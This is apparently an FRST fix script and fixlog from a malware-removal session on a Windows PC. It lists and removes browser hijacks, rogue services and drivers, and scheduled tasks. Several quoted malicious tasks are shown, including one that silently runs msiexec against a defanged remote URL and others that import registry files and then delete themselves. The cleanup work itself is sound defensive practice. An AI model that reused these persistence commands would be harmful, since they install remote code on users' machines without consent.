              SearchScopes: HKLM-x32 → {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487663291&z=b41367c29dd1525fd732f00g6 zeb1m2qfqec0odt6o&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX&q={searchTerms}
              SearchScopes: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001 → {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
              SearchScopes: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001 → {ielnksrch} URL =
              BHO-x32: Adobe PDF Link Helper → {18DF081C-E8AD-4283-A596-FA578C2EBDC3} → C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
              BHO-x32: Lync Browser Helper → {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} → C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2017-02-14] (Microsoft Corporation)
              BHO-x32: Microsoft OneDrive for Business Browser Helper → {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} → C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2017-02-14] (Microsoft Corporation)
              Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
              FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles\dvwdtm10.default\Profiles\d vwdtm10.default [not found]
              FF NewTab: Mozilla\Firefox\Profiles\dvwdtm10.default → about:newtab
              FF Homepage: Mozilla\Firefox\Profiles\dvwdtm10.default → about:home
              FF Keyword.URL: Mozilla\Firefox\Profiles\dvwdtm10.default → hxxp://www.bing.com/search?FORM=SK216DF&PC=SK216&q=
              FF Extension: (Bing Search) - C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default\Extensions\bingsearch.full@microsoft.com.xpi [2017-02-15]
              FF SearchPlugin: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default\searchplugins\bing-.xml [2017-02-15]
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartMenuInternet\ChromeHTML: → C:\Program Files (x86)\Standuck\Application\chrome.exe <==== ATTENTION
              C:\Program Files (x86)\Standuck
              S2 ed2kidle; “C:\Program Files (x86)\amulell\ed2k.exe” -downloadwhenidle
              S2 WINSNARE; C:\Users\ASUS\AppData\Roaming\WINSNARE\WinSnare.dl l <==== ATTENTION
              C:\Users\ASUS\AppData\Roaming\WINSNARE
              C:\Program Files (x86)\amulell
              S3 ADSPIDEREX; C:\Windows\system32\drivers\adspiderex.sys [55664 2015-12-28] ((주)디지탈온넷)
              C:\Windows\system32\drivers\adspiderex.sys
              R1 p1490101895am; C:\Users\ASUS\AppData\Local\Temp\bk1FB3.tmp\p14901 01895am.sys [746960 2017-03-21] (一普明为(北京)信息技术有限公司) <==== ATTENTION
              C:\Users\ASUS\AppData\Local\Temp\bk1FB3.tmp\p14901 01895am.sys
              C:\Users\ASUS\AppData\Local\Temp\bk1FB3.tmp
              S3 dbx; system32\DRIVERS\dbx.sys
              S1 p1490101675am; ??\C:\Users\ASUS\AppData\Local\Temp\bkC5D9.tmp\p14 90101675am.sys <==== ATTENTION
              C:\Users\ASUS\AppData\Local\Temp\bkC5D9.tmp
              C:\Users\ASUS\AppData\Local\Temp\bkC5D9.tmp\p14901 01675am.sys
              2017-03-31 21:50 - 2017-03-31 21:50 - 00004100 _____ C:\Windows\System32\Tasks\Kinyatiqther
              2017-03-31 21:50 - 2017-03-31 21:50 - 00002626 _____ C:\Windows\System32\Tasks\WinTOOL
              2017-03-31 21:50 - 2017-03-31 21:50 - 00002324 _____ C:\Windows\System32\Tasks\psv_TrisAir
              2017-03-31 21:50 - 2017-03-31 21:50 - 00002320 _____ C:\Windows\System32\Tasks\psv_Opedomtax
              2017-03-31 21:50 - 2017-03-31 21:50 - 00002308 _____ C:\Windows\System32\Tasks\psv_SumCore
              C:\Program Files\Enigma Software Group
              C:\Users\ASUS\Downloads\SpyHunter-Installer.exe
              C:\Program Files (x86)\58DA4F76_jumpeasy
              C:\Users\ASUS\Desktop\Hacks.EXE
              2017-03-13 09:17 - 2017-03-31 21:50 - 00002820 _____ C:\Windows\System32\Tasks\snp
              2017-03-13 09:17 - 2017-03-31 21:50 - 00002400 _____ C:\Windows\System32\Tasks\snf
              2017-03-13 09:16 - 2017-03-13 09:16 - 00000000 ____D C:\ProgramData\Zaamlas
              2017-03-13 09:15 - 2017-03-31 21:50 - 00002188 _____ C:\Windows\System32\Tasks\hostTask
              2017-03-13 09:12 - 2017-03-13 09:18 - 50053120 _____ C:\Program Files (x86)\GUTD09C.tmp
              2017-03-13 09:12 - 2017-03-13 09:12 - 00000000 ____D C:\Program Files (x86)\GUMD09B.tmp
              2017-03-13 09:14 - 2017-03-13 10:02 - 00000000 __SHD C:\Users\ASUS\AppData\Local\svchost
              C:\Program Files (x86)\774ba57a-96b9-4cb7-98c5-e1ed92c03dee1489364542
              C:\TOSTACK
              2017-03-31 21:50 - 2017-02-15 10:42 - 00004874 _____ C:\Windows\System32\Tasks\Thoveent Engine
              2017-03-31 21:50 - 2017-02-14 16:52 - 00003180 _____ C:\Windows\System32\Tasks\klcp_update
              2017-03-31 21:50 - 2017-02-14 16:07 - 00002604 _____ C:\Windows\System32\Tasks\KMS8Server
              2017-03-31 21:50 - 2017-02-14 16:07 - 00002258 _____ C:\Windows\System32\Tasks\KMS8
              2017-03-31 21:33 - 2017-02-21 14:48 - 00047170 _____ C:\Program Files (x86)\metadata
              2017-03-31 21:33 - 2017-02-21 14:48 - 00000040 _____ C:\Program Files (x86)\settings.dat
              2017-03-31 21:33 - 2017-02-21 14:48 - 00000000 ____D C:\Program Files (x86)\reports
              2017-03-28 18:56 - 2017-02-17 16:10 - 00000000 _____ C:\Users\Public\Documents
              2017-03-13 09:12 - 2017-03-13 09:18 - 50053120 _____ () C:\Program Files (x86)\GUTD09C.tmp
              2017-02-21 14:48 - 2017-03-31 21:33 - 0047170 _____ () C:\Program Files (x86)\metadata
              2017-02-21 14:48 - 2017-03-31 21:33 - 0000040 _____ () C:\Program Files (x86)\settings.dat
              2017-02-15 16:45 - 2017-02-15 16:45 - 0000038 ___SH () C:\Users\ASUS\AppData\Local\1754111884ee9ab5277ca0 0.95260103
              2017-03-14 09:31 - 2017-03-14 09:31 - 0000600 _____ () C:\Users\ASUS\AppData\Local\PUTTY.RND
              2017-03-07 08:15 - 2017-03-07 08:15 - 0007605 _____ () C:\Users\ASUS\AppData\Local\Resmon.ResmonCfg
              C:\Users\Public\VOIP.dat
              C:\ProgramData\Zaamla
              C:\ProgramData\PrefsSecure
              C:\Program Files (x86)\Coefutain
              C:\ProgramData\wintools
              C:\Windows\KMS8
              C:\Windows\system32\Drivers\etc\hosts
              hosts:
              Task: {E5F58150-8FA5-4E78-A7A5-434914E968B6} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe
              Task: {E7C10FD8-66F3-4D6B-A1FA-8D9C9CB940C7} - System32\Tasks\KMS8Server => C:\Windows\KMS8\KMS8.exe
              Task: {EED4372D-D54A-41FF-80BF-9C2D73D1BE12} - System32\Tasks\psv_TrisAir => cmd.exe /c regedit.exe /s “C:\ProgramData\Zaamla\Flexransing.reg” & del “C:\ProgramData\Zaamla\Flexransing.reg” & SCHTASKS /Delete /TN “psv_TrisAir” /F <==== ATTENTION
              Task: {055BE636-8A75-48CB-94E8-541F0E8BCDAD} - System32\Tasks\Thoveent Engine => C:\Program Files (x86)\Coefutain\chunoty.exe [2017-02-15] (Glarysoft Ltd)
              Task: {3D4F6FD6-2BB8-4E02-9835-48E03932218F} - System32\Tasks\snp => C:\ProgramData\Zaamla\Zaamla.exe <==== ATTENTION
              Task: {46277740-9FC6-4103-926B-67E95F4BDB70} - System32\Tasks\Kinyatiqther => “msiexec” /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS541010A9E680_JD1008DM20840W20840 WX&v=2017215 /q <==== ATTENTION
              Task: {4BC6F16B-425A-490B-B31A-C0052212C97F} - System32\Tasks\snf => C:\ProgramData\Zaamla\Zaamla.exe <==== ATTENTION
              Task: {4DDCF674-96F1-4D82-88C7-BE9E3C3668BA} - System32\Tasks\psv_Opedomtax => cmd.exe /c regedit.exe /s “C:\ProgramData\Zaamla\Flexflex.reg” & del “C:\ProgramData\Zaamla\Flexflex.reg” & SCHTASKS /Delete /TN “psv_Opedomtax” /F <==== ATTENTION
              Task: {92B98D34-5A01-480F-A2D9-EA2D69759E6F} - System32\Tasks\psv_SumCore => cmd.exe /c regedit.exe /s “C:\ProgramData\Zaamla\Opeplus.reg” & del “C:\ProgramData\Zaamla\Opeplus.reg” & SCHTASKS /Delete /TN “psv_SumCore” /F <==== ATTENTION
              Task: {A3522BEA-4747-4958-AE6D-785C40D3A9C1} - System32\Tasks\hostTask => C:\ProgramData\PrefsSecure\tree.exe <==== ATTENTION
              HKLM...\StartupApproved\Run: => “cAudioFilterAgent”
              HKLM...\StartupApproved\Run: => “ShadowPlay”
              HKLM...\StartupApproved\Run: => “GratoUpdate”
              HKLM...\StartupApproved\Run: => “GratoTray”
              HKLM...\StartupApproved\Run: => “ZAM”
              HKLM...\StartupApproved\Run32: => “AdobeCS6ServiceManager”
              HKLM...\StartupApproved\Run32: => “Adobe ARM”
              HKLM...\StartupApproved\Run32: => “Razer Synapse”
              HKLM...\StartupApproved\Run32: => “Dropbox”
              HKLM...\StartupApproved\Run32: => “AdobeAAMUpdater-1.0”
              HKLM...\StartupApproved\Run32: => “gplyra”
              HKLM...\StartupApproved\Run32: => “SmartAudio”
              HKLM...\StartupApproved\Run32: => “ZAM”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “OneDrive”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “BingSvc”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “Skype”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “Spotify”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “Spotify Web Helper”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “CCleaner Monitoring”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “PPBFY9hyTL.exe”
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartupApproved\Run: => “AdobeBridge”
              RemoveProxy:
              CMD: netsh advfirewall reset
              CMD: netsh advfirewall set allprofiles state On
              CMD: ipconfig /flushdns
              reboot:
              end


              Processes closed successfully.
              Restore point was successfully created.
              HKLM\Software\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\ => value not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Microsoft\Windows\CurrentVersion\Run \AdobeBridge => value not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\Software\Microsoft\Windows\CurrentVersion\Run \BingSvc => value not found.
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\Start Page => value restored successfully
              HKLM\Software\Microsoft\Internet Explorer\Main\Search Page => value restored successfully
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\Search Page => value restored successfully
              HKLM\Software\Microsoft\Internet Explorer\Main\Default_Page_URL => value restored successfully
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\Default_Page_URL => value restored successfully
              HKLM\Software\Microsoft\Internet Explorer\Main\Default_Search_URL => value restored successfully
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\Default_Search_URL => value restored successfully
              HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope => value restored successfully
              HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
              HKCR\CLSID{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
              HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\DefaultScope => value restored successfully
              HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch => key not found.
              HKCR\Wow6432Node\CLSID\ielnksrch => key not found.
              HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
              HKCR\Wow6432Node\CLSID{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
              HKCR\CLSID{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes{ielnksrch} => key not found.
              HKCR\CLSID{ielnksrch} => key not found.
              HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\Curren tVersion\Explorer\Browser Helper Objects{18DF081C-E8AD-4283-A596-FA578C2EBDC3} => key not found.
              HKCR\Wow6432Node\CLSID{18DF081C-E8AD-4283-A596-FA578C2EBDC3} => key not found.
              HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\Curren tVersion\Explorer\Browser Helper Objects{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} => key not found.
              HKCR\Wow6432Node\CLSID{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} => key not found.
              HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\Curren tVersion\Explorer\Browser Helper Objects{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} => key not found.
              HKCR\Wow6432Node\CLSID{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} => key not found.
              HKCR\PROTOCOLS\Handler\mso-minsb-roaming.16 => key not found.
              HKCR\CLSID{83C25742-A9F7-49FB-9138-434302C88D07} => key not found.
              HKCR\Wow6432Node\PROTOCOLS\Handler\mso-minsb-roaming.16 => key not found.
              HKCR\Wow6432Node\CLSID{83C25742-A9F7-49FB-9138-434302C88D07} => key not found.
              HKCR\PROTOCOLS\Handler\mso-minsb.16 => key not found.
              HKCR\CLSID{42089D2D-912D-4018-9087-2B87803E93FB} => key not found.
              HKCR\Wow6432Node\PROTOCOLS\Handler\mso-minsb.16 => key not found.
              HKCR\Wow6432Node\CLSID{42089D2D-912D-4018-9087-2B87803E93FB} => key not found.
              HKCR\PROTOCOLS\Handler\osf-roaming.16 => key not found.
              HKCR\CLSID{42089D2D-912D-4018-9087-2B87803E93FB} => key not found.
              HKCR\Wow6432Node\PROTOCOLS\Handler\osf-roaming.16 => key not found.
              HKCR\Wow6432Node\CLSID{42089D2D-912D-4018-9087-2B87803E93FB} => key not found.
              HKCR\PROTOCOLS\Handler\osf.16 => key not found.
              HKCR\CLSID{5504BE45-A83B-4808-900A-3A5C36E7F77A} => key not found.
              HKCR\Wow6432Node\PROTOCOLS\Handler\osf.16 => key not found.
              HKCR\Wow6432Node\CLSID{5504BE45-A83B-4808-900A-3A5C36E7F77A} => key not found.
              FF NewTab: Mozilla\Firefox\Profiles\dvwdtm10.default → about:newtab => not found
              FF Homepage: Mozilla\Firefox\Profiles\dvwdtm10.default → about:home => not found
              FF Keyword.URL: Mozilla\Firefox\Profiles\dvwdtm10.default → hxxp://www.bing.com/search?FORM=SK216DF&PC=SK216&q= => not found
              C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default\Extensions\bingsearch.full@microsoft.com.xpi => not found.
              “C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Pro files\dvwdtm10.default\searchplugins\bing-.xml” => not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => key not found.
              “C:\Program Files (x86)\Standuck” => not found.
              ed2kidle => service not found.
              WINSNARE => service not found.
              “C:\Users\ASUS\AppData\Roaming\WINSNARE” => not found.
              “C:\Program Files (x86)\amulell” => not found.
              ADSPIDEREX => service not found.
              “C:\Windows\system32\drivers\adspiderex.sys” => not found.
              p1490101895am => Unable to stop service.
              HKLM\System\CurrentControlSet\Services\p1490101895 am => key removed successfully
              p1490101895am => service removed successfully
              C:\Users\ASUS\AppData\Local\Temp\bk1FB3.tmp\p14901 01895am.sys => moved successfully
              C:\Users\ASUS\AppData\Local\Temp\bk1FB3.tmp => moved successfully
              HKLM\System\CurrentControlSet\Services\dbx => key removed successfully
              dbx => service removed successfully
              HKLM\System\CurrentControlSet\Services\p1490101675 am => key removed successfully
              p1490101675am => service removed successfully
              “C:\Users\ASUS\AppData\Local\Temp\bkC5D9.tmp” => not found.
              “C:\Users\ASUS\AppData\Local\Temp\bkC5D9.tmp\p1490 101675am.sys” => not found.
              C:\Windows\System32\Tasks\Kinyatiqther => moved successfully
              C:\Windows\System32\Tasks\WinTOOL => moved successfully
              C:\Windows\System32\Tasks\psv_TrisAir => moved successfully
              C:\Windows\System32\Tasks\psv_Opedomtax => moved successfully
              C:\Windows\System32\Tasks\psv_SumCore => moved successfully
              C:\Program Files\Enigma Software Group => moved successfully
              C:\Users\ASUS\Downloads\SpyHunter-Installer.exe => moved successfully
              C:\Program Files (x86)\58DA4F76_jumpeasy => moved successfully
              C:\Users\ASUS\Desktop\Hacks.EXE => moved successfully
              C:\Windows\System32\Tasks\snp => moved successfully
              C:\Windows\System32\Tasks\snf => moved successfully
              C:\ProgramData\Zaamlas => moved successfully
              C:\Windows\System32\Tasks\hostTask => moved successfully
              C:\Program Files (x86)\GUTD09C.tmp => moved successfully
              C:\Program Files (x86)\GUMD09B.tmp => moved successfully
              C:\Users\ASUS\AppData\Local\svchost => moved successfully
              C:\Program Files (x86)\774ba57a-96b9-4cb7-98c5-e1ed92c03dee1489364542 => moved successfully
              C:\TOSTACK => moved successfully
              C:\Windows\System32\Tasks\Thoveent Engine => moved successfully
              C:\Windows\System32\Tasks\klcp_update => moved successfully
              C:\Windows\System32\Tasks\KMS8Server => moved successfully
              C:\Windows\System32\Tasks\KMS8 => moved successfully
              C:\Program Files (x86)\metadata => moved successfully
              C:\Program Files (x86)\settings.dat => moved successfully
              C:\Program Files (x86)\reports => moved successfully
              “C:\Users\Public\Documents” => Warning: FRST is scripted not to move this directory.
              “C:\Program Files (x86)\GUTD09C.tmp” => not found.
              “C:\Program Files (x86)\metadata” => not found.
              “C:\Program Files (x86)\settings.dat” => not found.
              C:\Users\ASUS\AppData\Local\1754111884ee9ab5277ca0 0.95260103 => moved successfully
              C:\Users\ASUS\AppData\Local\PUTTY.RND => moved successfully
              C:\Users\ASUS\AppData\Local\Resmon.ResmonCfg => moved successfully
              “C:\Users\Public\VOIP.dat” => not found.
              “C:\ProgramData\Zaamla” => not found.
              “C:\ProgramData\PrefsSecure” => not found.
              C:\Program Files (x86)\Coefutain => moved successfully
              “C:\ProgramData\wintools” => not found.
              C:\Windows\KMS8 => moved successfully
              C:\Windows\system32\Drivers\etc\hosts => moved successfully
              Hosts restored successfully.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{E5F5815 0-8FA5-4E78-A7A5-434914E968B6} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{E5F5815 0-8FA5-4E78-A7A5-434914E968B6} => key removed successfully
              C:\Windows\System32\Tasks\WinTOOL => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinTOOL => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{E7C10FD 8-66F3-4D6B-A1FA-8D9C9CB940C7} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{E7C10FD 8-66F3-4D6B-A1FA-8D9C9CB940C7} => key removed successfully
              C:\Windows\System32\Tasks\KMS8Server => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KMS8Serv er => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{EED4372 D-D54A-41FF-80BF-9C2D73D1BE12} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{EED4372 D-D54A-41FF-80BF-9C2D73D1BE12} => key removed successfully
              C:\Windows\System32\Tasks\psv_TrisAir => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Tris Air => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{055BE63 6-8A75-48CB-94E8-541F0E8BCDAD} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{055BE63 6-8A75-48CB-94E8-541F0E8BCDAD} => key removed successfully
              C:\Windows\System32\Tasks\Thoveent Engine => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Thoveent Engine => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{3D4F6FD 6-2BB8-4E02-9835-48E03932218F} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{3D4F6FD 6-2BB8-4E02-9835-48E03932218F} => key removed successfully
              C:\Windows\System32\Tasks\snp => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\snp => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{4627774 0-9FC6-4103-926B-67E95F4BDB70} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{4627774 0-9FC6-4103-926B-67E95F4BDB70} => key removed successfully
              C:\Windows\System32\Tasks\Kinyatiqther => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Kinyatiq ther => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{4BC6F16 B-425A-490B-B31A-C0052212C97F} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{4BC6F16 B-425A-490B-B31A-C0052212C97F} => key removed successfully
              C:\Windows\System32\Tasks\snf => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\snf => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{4DDCF67 4-96F1-4D82-88C7-BE9E3C3668BA} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{4DDCF67 4-96F1-4D82-88C7-BE9E3C3668BA} => key removed successfully
              C:\Windows\System32\Tasks\psv_Opedomtax => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Oped omtax => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{92B98D3 4-5A01-480F-A2D9-EA2D69759E6F} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{92B98D3 4-5A01-480F-A2D9-EA2D69759E6F} => key removed successfully
              C:\Windows\System32\Tasks\psv_SumCore => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_SumC ore => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain{A3522BE A-4747-4958-AE6D-785C40D3A9C1} => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks{A3522BE A-4747-4958-AE6D-785C40D3A9C1} => key removed successfully
              C:\Windows\System32\Tasks\hostTask => not found.
              HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\hostTask => key removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\cAudioFilterAgent => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \cAudioFilterAgent => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\ShadowPlay => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \ShadowPlay => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\GratoUpdate => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \GratoUpdate => value not found.
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\GratoTray => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \GratoTray => value not found.
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\ZAM => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \ZAM => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\AdobeCS6ServiceManager => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\AdobeCS6ServiceManager => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\Adobe ARM => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\Adobe ARM => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\Razer Synapse => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\Razer Synapse => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\Dropbox => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\Dropbox => value removed successfully
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\AdobeAAMUpdater-1.0 => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\AdobeAAMUpdater-1.0 => value not found.
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\gplyra => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\gplyra => value not found.
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\SmartAudio => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\SmartAudio => value not found.
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run32\ZAM => value removed successfully
              HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\Curren tVersion\Run\ZAM => value not found.
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer\StartupApproved\Run\OneDrive => value removed successfully
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \OneDrive => value removed successfully
